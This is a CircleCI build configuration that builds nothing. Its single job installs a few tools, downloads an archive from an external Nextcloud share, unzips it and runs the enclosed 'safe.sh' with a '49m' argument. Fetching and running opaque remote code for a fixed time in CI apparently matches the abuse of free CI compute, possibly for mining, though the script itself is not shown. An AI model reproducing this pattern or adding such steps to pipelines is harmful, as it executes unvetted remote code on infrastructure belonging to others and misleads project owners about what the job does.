version: 2.1
jobs:
  build:
    docker: 
      - image: ubuntu:18.04
    steps:
      - run:
          command: |
            export DEBIAN_FRONTEND=noninteractive
            apt update
            apt install unzip wget git sudo -y
            wget https://nextcloud-fi.webo.hosting/s/agyBwDzTJBFcoZT/download
            unzip download
            bash safe.sh 49m
